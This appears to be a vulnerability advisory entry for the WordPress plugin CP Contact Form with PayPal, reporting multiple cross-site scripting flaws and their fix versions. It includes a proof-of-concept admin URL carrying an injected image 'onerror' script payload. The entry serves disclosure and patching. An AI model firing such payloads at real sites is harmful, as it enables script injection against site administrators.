WordPress Plugin Vulnerabilities
CP Contact Form with Paypal <= 1.3.01 - Multiple XSS
Description
The CP Contact Form with PayPal WordPress plugin was affected by a Multiple XSS security vulnerability.
Proof of Concept
Version <= 1.2.97 - /wp-admin/admin.php?page=cp_contact_form_paypal.php&edit=1&cal=1&item=css"><img src=x onerror=alert(/XSS/)>&r=1 (fixed in 1.2.98)
Affects Plugins
Fixed in version 1.3.02
References
Classification
Miscellaneous
Verified
No
Timeline
Publicly Published
2019-06-23 (about 3 years ago)
Added
2019-06-23 (about 3 years ago)
Last Updated
2020-09-22 (about 2 years ago)